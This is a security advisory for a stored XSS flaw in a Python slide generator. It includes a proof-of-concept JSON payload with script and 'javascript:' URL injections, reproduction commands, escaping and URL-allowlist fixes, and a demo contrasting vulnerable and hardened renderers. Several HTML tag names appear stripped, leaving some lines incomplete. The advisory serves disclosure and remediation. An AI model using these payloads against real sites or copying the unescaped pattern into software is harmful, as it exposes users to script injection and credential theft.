# Slide Generator Multiple Stored XSS Vulnerability Summary

## Vulnerability Overview

* **Vulnerability Name**: Slide Generator Multiple Stored XSS (46 Injection Points)
* **Vulnerability ID**: #247
* **Vulnerability Type**: Stored Cross-Site Scripting (CWE-79)
* **Severity**: High (CVSS 3.1 Score: 8.1)
* **Affected Product**: UI/UX Pro Max Skill (uipro-cli)
* **Affected Versions**: v2.5.0 and earlier
* **Root Cause**: When generating HTML slides, user-controlled JSON data is embedded directly into the HTML output through Python f-strings without any HTML entity encoding.

## Impact Scope

* **Injection Points**: 46 unique data injection points.
* **Attack Vector**: Network — attackers can distribute malicious JSON via repositories, URLs, or AI prompts.
* **Attack Complexity**: Low — a simple JSON input is enough to trigger the vulnerability.
* **Privileges Required**: None — anyone can create the JSON.
* **User Interaction**: Required — the victim must open the generated HTML file in a browser.
* **Specific Impacts**:
  * **Cookie Theft**: Execute malicious code via `` tags.
  * **Session Hijacking**: Steal authentication tokens from same-origin applications.
  * **Phishing Attacks**: Use `` overlays to mimic login pages.
  * **Keylogging**: Inject event listeners to capture all keystrokes.
  * **Credential Theft**: Replace slide content with fake login forms.
  * **Worm Propagation**: If the deck is shared via internal tools, the XSS spreads to every viewer.

## Remediation

1. **HTML Encoding**: Before embedding user data, apply HTML entity encoding to every value using `html.escape`.
2. **URL Validation**: For URLs placed in `href` attributes, validate the protocol (allow only `http://`, `https://`, `#`, `/`) and encode the URL.

## POC Code

### 1. Create Malicious JSON Input

```json
{
  "title": "Test",
  "slides": [
    {
      "type": "title",
      "title": "alert('XSS')",
      "badge": "",
      "company": "Test"
    },
    {
      "type": "cta",
      "headline": "Click",
      "cta": "Start",
      "cta_url": "javascript:alert(document.domain)",
      "contact": "x",
      "website": "x"
    }
  ]
}
```

### 2. Generate HTML

```bash
python3 generate-slide.py --json payload.json --output xss-output.html
```

### 3. Verify Injection

```bash
$ grep -c "" xss-output.html
1
$ grep -c "onerror" xss-output.html
1
$ grep -c "javascript:" xss-output.html
1
```

### 4. Generated HTML Contains Unescaped Content

```html
alert('XSS')
Start
```

### 5. Reproduction Result

```bash
$ python3 generate-slide.py --json payload.json --output output.html
Deck generated: output.html
$ grep "" output.html
alert('XSS')
$ grep "javascript:" output.html
Start
```

Opening `output.html` in a browser triggers JavaScript execution.

### 6. Remediation Code Example

**Fix HTML Encoding:**

```python
from html import escape


def generate_title_slide(data):
    # Every value read from the JSON is entity-encoded before it is interpolated.
    return f'''
    {escape(str(data.get('badge', 'Pitch Deck')))}
    {escape(str(data.get('title', 'Title')))}
    ...
    '''
```

**Fix href Injection:**

```python
from html import escape


def safe_url(url, default='x'):
    # Accept only the allow-listed prefixes, then encode for a quoted attribute.
    if url and url.strip().lower().startswith(('http://', 'https://', '#', '/')):
        return escape(url, quote=True)
    return default
```
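The vulnerable f-string pattern beside its hardened counterpart, as an added example that is not the uipro-cli project's code: it assumes a minimal `cta` slide template with `headline`, `cta` and `cta_url` fields, encodes text and attribute values with `html.escape`, and tightens the prefix allowlist above by rejecting protocol-relative `//host` URLs and by removing the whitespace and control characters browsers ignore before reading a scheme.

```python
import re
from html import escape

# Allowed href prefixes, as listed in the advisory's remediation.
_SAFE_PREFIXES = ('http://', 'https://', '#', '/')
# Browsers drop TAB/LF/CR inside a URL and ignore leading/trailing C0 controls and spaces.
_STRIP_INNER = re.compile(r'[\t\n\r]')
_STRIP_EDGES = ''.join(chr(c) for c in range(0x21))

def render_cta_vulnerable(data):
    """The pattern the advisory describes: raw JSON values inside an f-string."""
    return (f'<h2>{data.get("headline", "")}</h2>'
            f'<a href="{data.get("cta_url", "#")}">{data.get("cta", "Start")}</a>')

def safe_url(url, default='#'):
    """Return url escaped for an attribute if its scheme is allowed, else default."""
    if not isinstance(url, str):
        return default
    cleaned = _STRIP_INNER.sub('', url).strip(_STRIP_EDGES)
    # A bare '/' prefix would also admit protocol-relative '//host' URLs.
    if cleaned.startswith('//'):
        return default
    if cleaned.lower().startswith(_SAFE_PREFIXES):
        return escape(cleaned, quote=True)
    return default

def render_cta_safe(data):
    """Same slide, with each value encoded for the context it lands in."""
    headline = escape(str(data.get('headline', '')))
    label = escape(str(data.get('cta', 'Start')))
    href = safe_url(data.get('cta_url'))
    return f'<h2>{headline}</h2><a href="{href}">{label}</a>'

def contains_active_content(html_out):
    """Crude detector mirroring the advisory's grep checks on the output file."""
    lowered = html_out.lower()
    return '<script' in lowered or 'javascript:' in lowered

# Constructed sample, modelled on the advisory's cta-slide payload.
PAYLOAD = {
    "type": "cta",
    "headline": "<script>alert('XSS')</script>",
    "cta": "Start",
    "cta_url": "javascript:alert(document.domain)",
}

if __name__ == '__main__':
    print('vulnerable output flagged:', contains_active_content(render_cta_vulnerable(PAYLOAD)))
    print('hardened output flagged:  ', contains_active_content(render_cta_safe(PAYLOAD)))
```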